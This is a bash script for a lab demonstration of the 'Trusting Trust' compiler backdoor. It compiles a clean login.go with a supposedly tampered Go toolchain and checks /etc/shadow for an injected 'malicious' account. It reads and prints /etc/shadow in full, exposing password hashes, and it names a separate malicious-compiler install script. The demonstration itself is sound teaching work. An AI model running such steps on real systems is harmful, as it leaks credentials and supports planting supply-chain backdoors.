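#!/bin/bash
#
# demo_exploit.sh — narrated lab demonstration of the "Trusting Trust"
# (compromised-compiler) attack: a clean login.go is built with the lab's Go
# toolchain, the resulting binary is run, and /etc/shadow is shown before and
# after so the effect of a compiler-injected change can be observed.
#
# Expectations (only the Go lookup is actually checked):
#   - the lab Go toolchain is installed (the narration names the install
#     script that sets it up);
#   - /exploit/login.go is present;
#   - the script has permission to read /etc/shadow (normally root only).
#
# Exit status: 1 when Go is missing or a file cannot be read, built or run;
# otherwise 0, regardless of whether the marker entry is found in /etc/shadow.
# Both /etc/shadow dumps go to stdout, so the terminal transcript contains the
# password hashes. The sleeps only pace the narration for a live audience.

# Prints the banner and the background narration for the audience.
print_intro() {
  echo -e "\n\n*******************************************************************************"
  echo -e "_____________ __ __________________ ________ __________ __ _____________\n /_ __/ __ \/ / / / ___/_ __/ _/ | / / ____/ /_ __/ __ \/ / / / ___/_ __/\n / / / /_/ / / / /\__ \ / / / // |/ / / __ / / / /_/ / / / /\__ \ / / \n / / / _, _/ /_/ /___/ // / _/ // /| / /_/ / / / / _, _/ /_/ /___/ // / \n/_/ /_/ |_|\____//____//_/ /___/_/ |_/\____/ /_/ /_/ |_|\____//____//_/ \n \n"
  echo -e "*******************************************************************************\n\n"
  echo -e "The 'Trusting Trust' attack is a type of compiler exploit where a malicious compiler is used to inject malicious code into a program, even if the program's source code is clean, leveraging the trust developers put in their code.\nThis is done by modifying the compiler to recognize specific patterns in the source code and replacing them with malicious code.\nThe attack is self-replicating, a quine, meaning that even if the malicious compiler is upgraded, the new compiler will also be malicious. This allows for attacker persistence and assumes we build our compilers from source."
  sleep 3
  echo -e "\nThe exploit example shows a scenario where a malicious compiler targets a login program, creating a backdoor to login to the target system."
  echo -e "\nIn this example, the initial access to plant the malicious compiler sources is unspecified, but many attack vectors apply (ref XCodeGhost etc).\nThe malicious compiler should already be installed on the system, to redo this process, you can run '/exploit/install_malicious_go_compiler.sh', eg by specfing it as entrypoint to the container."
  sleep 2
  echo -e "\n\n****************************************************"
  echo -e "* EXPLOIT SCRIPT STARTING *"
  echo -e "****************************************************\n\n"
}

# Verifies that a Go toolchain is on PATH and reports whether its version is
# one of the two the lab labels as the tampered compiler. Exits 1 when Go is
# absent; the version comparison itself is informational only.
check_compiler() {
  local go_version
  echo -e "\n[PRE-EXPLOIT STATE]"
  if ! command -v go &> /dev/null; then
    echo ">> Go is not installed. Aborting."
    exit 1
  fi
  # grep -P (PCRE) is GNU grep; the lab image is assumed to be Linux.
  go_version=$(go version | grep -oP 'go1\.\d+\.\d+')
  if [[ $go_version == "go1.11.1" || $go_version == "go1.11.2" ]]; then
    echo ">> Malicious Go compiler version $go_version installed."
  else
    echo ">> Go compiler version $go_version may be benign."
  fi
}

# Shows /etc/shadow and the login.go source before anything is built.
# Either read failing aborts the demo with status 1.
show_pre_state() {
  sleep 1
  echo -e "\n>> State of shadow file '/etc/shadow' before the exploit..."
  echo -e "\n---------------------------------------------------------------"
  cat /etc/shadow || { echo "Failed to read /etc/shadow"; exit 1; }
  echo -e "--------------------------------------------------------------"
  sleep 2
  echo -e "\n>> Showing benign 'login.go' program..."
  echo -e "\n---------------------------------------------------------------"
  cat /exploit/login.go || { echo "Failed to read /exploit/login.go"; exit 1; }
  echo -e "---------------------------------------------------------------"
  sleep 1
}

# Builds login.go and runs the resulting binary.
# -o pins the output to /exploit/login: without it, go build writes the
# binary into the current working directory, so the program executed below
# would only be the freshly built one when the script happens to be run from
# /exploit.
build_and_run() {
  echo -e "\n>> Compiling login.go 'go build -o /exploit/login /exploit/login.go'...\n"
  sleep 1
  go build -o /exploit/login /exploit/login.go || { echo "Compilation failed"; exit 1; }
  echo -e "\n>> Compilation successful. Executing login program...\n"
  sleep 1
  echo -e "\n---------------------------------------------------------------"
  /exploit/login || { echo "Failed to run the login program"; exit 1; }
  echo -e "\n---------------------------------------------------------------"
  echo -e "\n>> Execution of 'login.go' completed.\n"
  sleep 2
}

# Shows /etc/shadow again and reports whether the marker entry is present.
# The grep is the demo's only success criterion: it matches a "malicious"
# account line whose trailing shadow fields are all empty (seven consecutive
# colons). Nothing is changed; this function only reads and reports.
show_result() {
  echo -e "\n[POST EXPLOIT STATE]\n"
  echo -e ">> State of shadow file '/etc/shadow' **after** the exploit..."
  echo -e "\n---------------------------------------------------------------"
  cat /etc/shadow || { echo "Failed to read /etc/shadow"; exit 1; }
  echo -e "--------------------------------------------------------------"
  sleep 1
  if grep -q "^malicious:.*:::::::" /etc/shadow; then
    echo -e "\n>> Shadow file has been modified from benign source code.\n>> [EXPLOIT SUCCESSFUL]"
  else
    echo -e "\n>> No malicious change to shadow file was detected.\n>> [EXPLOIT FAILED]"
  fi
}

main() {
  print_intro
  check_compiler
  show_pre_state
  build_and_run
  show_result
}

main "$@"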